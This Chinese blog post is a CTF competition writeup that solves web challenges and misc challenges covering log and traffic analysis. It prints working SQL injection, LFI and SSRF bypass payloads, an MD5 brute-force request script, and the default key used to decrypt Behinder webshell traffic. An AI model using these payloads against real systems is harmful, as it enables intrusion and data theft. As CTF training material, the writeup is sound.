某网络安全人才能力评估实践赛 Writeup By 2ha0yuk7on

已于 2023-10-12 17:01:38 修改
阅读量1.3k 收藏 1
点赞数
文章标签: web安全 安全 php python
于 2022-11-23 10:53:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sorryagain/article/details/127993450
版权

文章目录

本次比赛题目总体较简单,都是较基础的常见考点,很多题目名称基本上直接都告诉考点了。但是时间不太够,CTF部分差一道题AK了,然后赛后看了一下那道题也不难,甚至还没我做出的其他题难。。。

Web

字节的秘密

题目告诉了参数为 id,尝试传入 1

在这里插入图片描述

经过测试,此处存在宽字节注入。成功查询当前数据库名:

?id=0%bf' union select 1,database()--+

image

经过测试,直接查询 flag 的话会报错:

Illegal mix of collations (gbk_chinese_ci,IMPLICIT) and (latin1_swedish_ci,IMPLICIT) for operation 'UNION'

这是因为 Mysql 的编码不一致问题导致的,使用CONVERT()函数转换即可:

?id=0%bf' union select 1,convert(thisisflag,char) from pwnhubsql1.flag--+

image

LFI

根据题目猜测为文件包含漏洞,找到某页面传入了 path 参数。

image

我使用php://input来执行命令没有成功,所以使用 php 伪协议读取 flag 文件。

/index.php?path=php://filter/read=convert.base64-encode/resource=flag.php

image

解码 base64 即可。

PD9waHAgJGZsYWc9ImZsYWd7bGZpczBlYXN5fSI7Pz4K
flag{lfis0easy}

Shiro

image

当时看到题目名称就猜到了是 Shiro 550 反序列化,我甚至都没打开页面,直接一把梭。

image

Githack!

看到题目已经提示了,直接Git泄露一把梭。

image

千山万水

给了一个php页面,fuzz一下发现参数名是id,尝试一下输入1能够正常显示,输入2返回空白。

image

经过测试,该页面存在 SQL 注入漏洞,联合注入即可,题目过滤了空格,使用注释符/**/绕过。

sql4.php?id=2'/**/union/**/select/**/1,database()%27

image

读取flag,括号或注释符绕过均可

sql4.php?id=2'/**/union/**/select/**/1,(select(thisisflag)from(flaghahaha))%23

image

urlssrf

先看源码:

<?php 
	highlight_file(__FILE__); 
	function check_inner_ip($url) 
	{ 
		$match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); 
		if (!$match_result) 
		{ 
			die('url fomat error'); 
		} 
		try 
		{ 
			$url_parse=parse_url($url); 
		} 
		catch(Exception $e) 
		{ 
			dir('url fomat error'); 
			return false; 
		} 
		$hostname=$url_parse['host']; 


		$ip=gethostbyname($hostname); 
		$int_ip=ip2long($ip); 
		return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
	} 

	function safe_request_url($url) 
	{ 

		if (check_inner_ip($url)) 
		{ 
			echo $url.' is inner ip'; 
		} 
		else 
		{ 
			//var_dump($url); 
			$ch = curl_init(); 
			curl_setopt($ch, CURLOPT_URL, $url); 
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
			curl_setopt($ch, CURLOPT_HEADER, 0); 
			$output = curl_exec($ch); 
			$result_info = curl_getinfo($ch); 
			if ($result_info['redirect_url']) 
			{ 
				safe_request_url($result_info['redirect_url']); 
			} 
			curl_close($ch); 
			var_dump($output); 
		} 

	} 

	$url = $_POST['url']; 
	if(!empty($url)){ 
		safe_request_url($url); 
	} 
	else{ 
		highlight_file(__file__); 
	} 
	//flag in flag.php 
?>

可以看到 check_inner_ip 函数通过 url_parse 检测用户上送的 url 是否为内网ip。如果不是内网 ip,则再通过 curl 请求 url。

这道题的考点是PHP函数对于URL的解析问题,具体是 curlparse_url 的解析差异:

  • curl 解析的是第一个 @ 后面的网址
  • parse_url 解析的是第二个 @ 后面的网址

借用一张图来看下:

在这里插入图片描述
因此可以利用 curlparse_url 解析的差异不同来绕过,让 parse_url 解析互联网ip,最后 curl 请求本地ip,利用ssrf读取文件。

Payload:

url=http://@127.0.0.1:80@baidu.com/flag.php

注意一定要加端口号,否则解析不成功:

在这里插入图片描述

写个脚本吧

这是一道PHP代码审计题,主要考察了脚本编写能力,先看代码:

<?php
	error_reporting(0);
	session_start();
	require ('./flag.php');
	if (!isset($_SESSION['nums'])) {
		$_SESSION['nums'] = 0;
		$_SESSION['time'] = time();
		$_SESSION['whoami'] = 'ea';
	}
	if ($_SESSION['time'] + 120 < time()) {
		session_destroy();
	}
	$value = $_REQUEST['value'];
	$str_rand = range('a', 'z');
	$str_rands = $str_rand[mt_rand(0, 25) ] . $str_rand[mt_rand(0, 25) ];
	if ($_SESSION['whoami'] == ($value[0] . $value[1]) && substr(md5($value) , 5, 4) == 0) {
		$_SESSION['nums']++;
		$_SESSION['whoami'] = $str_rands;
		echo $str_rands;
	}
	if ($_SESSION['nums'] >= 10) {
		echo $flag;
	}
	show_source(__FILE__);
?>

进行代码审计,定位关键代码,可以得知以下信息:

  1. whoami参数的初始值为ea,用户可以使用value参数传入数据。
  2. 定位到第三个if条件分支语句。对用户传入的value字符串求MD5值,如果这个MD5值的第5-8位都为0,且value的前两位和whoami参数的值相等,则进入分支。
  3. 分支逻辑位随机从a-z中取两个字母组成字符串,并将该字符串的值赋给whoami参数,并回显。nums参数自增。
  4. 当nums参数大于10时,显示flag。

因此我们需要通过暴力求解出符合条件的字符串,即前两位为whoami参数值,并且整个字符串MD5值的第5-8位都为0,循环10次调用即可。

import requests
import string
import random
import hashlib

let = string.ascii_lowercase


def attack(payloads):
    for a in range(100000000):
        payload = payloads
        for i in range(6):
            payload += let[random.randint(0, 25)]
        mdre = hashlib.md5(payload.encode('utf-8')).hexdigest()[5:9]
        if mdre == '0000':
            print(payload)
            resp1 = session.get(burp0_url + payload)
            value1 = resp1.content.decode()[:2]
            print(value1)
            print(resp1.content)
            break
    return value1


if __name__ == '__main__':
    session = requests.session()
    burp0_url = "http://xxxxx/?value="
    payload = 'ea'
    resp = session.get(burp0_url + payload)
    if len(resp.content) > 5619:
        value = resp.content.decode()[:2]
    payload = value
    for ii in range(10):
        payload = attack(payload)

运行得到flag:

image

Misc

日志分析

一道简单的日志分析题,发现有一个参数在进行大量的 SQL 注入尝试,并且都返回 200 状态码。

image

因此存在漏洞的页面及参数为:

search.php?q=

提交即可获得flag

image

简单流量分析

这道题暂时不放了。

流量数据分析

签到水平,追踪TCP流即可。

image

异常流量分析

明显是冰蝎流量

在这里插入图片描述

冰蝎2一般会有一个动态密钥协商的过程,找了一会没有发现密钥信息,直接默认密钥e45e329feb5d925b解AES即可:

得到报文内容:

{"status":"c3VjY2Vzcw==","msg":"ZmxhZ3thMzAyOTE5YTcwMGQ0ZDIyYmRlMmJmNWQyNDQ3OWE0NH0K"}

解Base64:

{"status":"success","msg":"flag{a302919a700d4d22bde2bf5d24479a44}"}

windows日志分析

windows日志审计,需要输入上一次RDP成功登陆的ip、date和user获得flag。

搜索事件ID为528的登录成功日志,然后查找登录类型为10的RDP登录日志。

在这里插入图片描述

flag如下:

在这里插入图片描述

2ha0yuk7on.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
某CTF---php反序列化字符串溢出
3tefanie丶zhou的博客
12-28 2663
【我们的言语,既会千山万水,迷障横生,也能铺路搭桥,柳暗花明。故而与亲近之人朝夕久处,不可说气话,不可说反话,不可不说话。】
CTF系列之Web——SQL注入
洛柒尘的博客
06-09 8598
前言 在刚学习sql注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的sql注入知识点。 学习web系列推荐先学习Mysql、H
shiro漏洞复现及其攻击流量分析
akxnxbshai的博客
04-09 6951
分析一下shiro的攻击流量特征。
悬剑武器库之5种工具学习(shiro检测插件、子域名、信息收集、暴力破解等)
zhangge3663的博客
01-18 8705
工具目录 1.BurpShiroPassiveScan是一款基于BurpSuite的被动式shiro检测插件2.reconftw是对具有多个子域的目标执行全面检查的脚本3.CTFR是一款不适用字典攻击也不适用蛮力获取的子域名的工具4.JR-scan是一款一键实现基本信息收集,支持POC扫描,支持利用AWVS探测的工具5.dirsearch-Web是一种成熟的命令行工具,旨在暴力破解Web服务器中的目录和文件 1.BurpShiroPassiveScan 介绍 BurpShiroPassiveScan
工具|渗透测试之5种工具分享(Shiro插件、CTFR、JR-scan、dirsearch-Web等)
zhangge3663的博客
05-06 3759
工具目录 1.BurpShiroPassiveScan是一款基于BurpSuite的被动式shiro检测插件; 2.reconftw是对具有多个子域的目标执行全面检查的脚本; 3.CTFR是一款不适用字典攻击也不适用蛮力获取的子域名的工具; 4.JR-scan是一款一键实现基本信息收集,支持POC扫描,支持利用AWVS探测的工具 5.dirsearch-Web是一种成熟的命令行工具,旨在暴力破解Web服务器中的目录和文件 1.BurpShiroPassiveScan 介绍 BurpShiro
网络安全管理职业技能大WriteUP
weixin_39664643的博客
10-14 1640
网络安全管理职业技能大WriteUP 0X01 签到 Base32解码可得flag flag{546dcd6b-33cf-408e-a603-27760ada9844} 0X02 被黑了_q1 首先下载压缩文件,解压使用wireshark打开,过滤http包大致查看 题目要找后台管理员的密码,过滤器里使用 http contains "admin" 过滤,如下图第一个请求包的内容,密码为admin123,再按照题目中所说操作得到flag{0192023a7bbd73250516..
BUUCTF密码学部分前十二题(l1ght)
B1_ye的博客
07-17 4084
1.MD5 解压压缩包之后我们将得到这样一串字符:e00cf25ad42683b3df678c61f42c6bda 将这串字符进行MD5解密,得到flag:flag{admin1} 2.url编码 得到字符:%66%6c%61%67%7b%61%6e%64%20%31%3d%31%7d 进行url解码:flag{and 1=1} 3.一眼就解密 得到字符:ZmxhZ3tUSEVfRkxBR19PRl9USElTX1NUUklOR30= 很明显,一眼就能看出这是base64,也可以由尾部的“.
CTF -杂项密码学,常见密码介绍(三)
半岛铁盒的博客
04-14 1243
ROT13密码 即旋转,往后/往前13位 ROT13(回转13位,rotate by 13 places,有时中间加了个连字符称作ROT-13)是一种简易的替换式密码。 ROT13被描述成“杂志字谜上下颠倒解答的Usenet点对点体”。ROT13 也是过去在古罗马开发的凯撒加密的一种变体。 A换成N、B换成O、依此类推到M换成Z,然后序列反转:N换成A、O换成B、最后Z换成M。 题目:synt{5pq1004q-86n5-46q8-o720-oro5on0417r1} 在线解密:http://www.r
Illegal mix of collations (gb2312_chinese_ci,IMPLICIT) and (latin1_swedish_ci,IMPLICIT)错误的解决方案
帘卷西风的专栏
10-26 3334
今天,测试组的同事在群里突然说自己账号里面角色的名字乱码了,我猜想应该是和数据库有关,还没解决又有一位同事和我说不能创建角色了,我看了DBServer的日志发现了一条错误:       15:41:30| module :DBAENGINE ERROR>> databaseID = 1 database name = cogame, asynchronism queue ID = 0, data
解决Mysql:Illegal mix of collations (gbk_chinese_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='
热门推荐
hi0000012345的专栏
05-26 1万+
<br /><br />发现是字符集的问题<br />首先、查看mysql的my.cnf,确认为utf8<br /><br />mysql> show variables like "%char%";<br />+--------------------------+-------------------------------------+<br />| Variable_name            | Value                               |<br />+-----
解决Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (gbk_chinese_ci,COERCIBLE) for operatio
sinat_27966387的博客
05-29 2552
进入MySQL,分别查看rejectprj和reviewprj两个表的结构,通过show full columns from &lt;table&gt;,查看其Collation,如下图其中reviewprj的fhbh为gbk_chinese_ci,而rejectprj的fhbh为latin1_swedish_ci,所以当两表通过fhbh关联时,就会出现以上错误。 则通过以下命令将rejectpr...
如何解决Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (gbk_chinese_ci,IMPLICIT)的问题
逍遥友的专栏
10-28 5171
在执行以下SQL语句时 sql = "select reject_id, rejectdate,rejectreason, receivedocdate, receivedoctime from rejectprj where fhbh=(selectfhbh from reviewprj where id=?) order by reject_id desc " ; 出现以下错误: Ill
网络安全网络安全中的常见攻击方式:被动攻击、主动攻击与中间人攻击
一定要站在自己热爱的生活里闪闪发光
08-27 427
在信息化时代,网络安全已经成为企业和个人都非常关注的领域。无论是个人隐私还是企业机密,随着互联网的广泛应用,保护这些信息免受攻击变得越来越重要。攻击者通过各种方式试图获取、篡改或破坏信息,这些方式大致可以分为被动攻击、主动攻击和中间人攻击三类。了解这些攻击方式有助于我们更好地保护自己的信息安全
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
08-30 999
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
信息安全--(四)网络安全体系与安全模型(二)
m0_60936698的博客
08-30 691
■ 等级保护分为五个:第一级(用户自主保护级)、第二级(系统审计保护级)、第三级(安全标记保护级)、第四级(结构化保护级)、第五级(访问验证保护级)。■ ①扩大了对象方位,将云计算、移动互联、物联网、工业控制系统等列入标准范围,构成了“网络安全 通用要求+新型应用的网络安全扩展要求”的要求内容。■ 管理手段:包括安全评估安全监管、应急响应、安全协调、安全标准和规范、保密检查、认证和访 问控制等;管理目标: (大)政治、经济、文化、国防安全等,(小)网络系统的保密、可用、可控等。·监督安全项目的实施;
网络安全】分析重置密码功能实现账户接管
等风来
08-26 220
点击了重新发送电子邮件的按钮后,我在攻击者的邮箱得到了受害者的重置密码链接,从而实现了账户接管。
网络安全】XML-RPC漏洞之盲SSRF
等风来
08-27 343
我收到的响应是这样的,响应体中的状态为0,表示请求已成功发送:
网络安全】分析cookie实现PII IDOR
等风来
08-27 98
目标:公共电子商务类型的网站,每月有大约6万到10万访问者,注册用户大约有5万。
网络安全(黑客)自学
白帽子凯哥聊黑客
08-30 754
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值